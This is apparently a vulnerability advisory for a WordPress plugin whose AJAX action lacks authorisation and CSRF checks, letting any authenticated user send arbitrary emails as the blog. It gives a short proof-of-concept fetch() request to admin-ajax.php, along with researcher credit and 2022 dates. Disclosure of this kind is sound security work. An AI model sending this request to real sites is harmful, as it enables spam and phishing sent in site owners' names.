The plugin does not have authorisation and CSRF checks in an AJAX action, allowing any authenticated users to send arbitrary emails on behalf of the blog
fetch("/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": "action=atbdp_send_announcement&[email protected]&subject=subject&message=content&send_to_email=1", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Krzysztof Zając
Krzysztof Zając
Yes
2022-07-26 (about 6 months ago)
2022-07-26 (about 6 months ago)
2022-07-26 (about 6 months ago)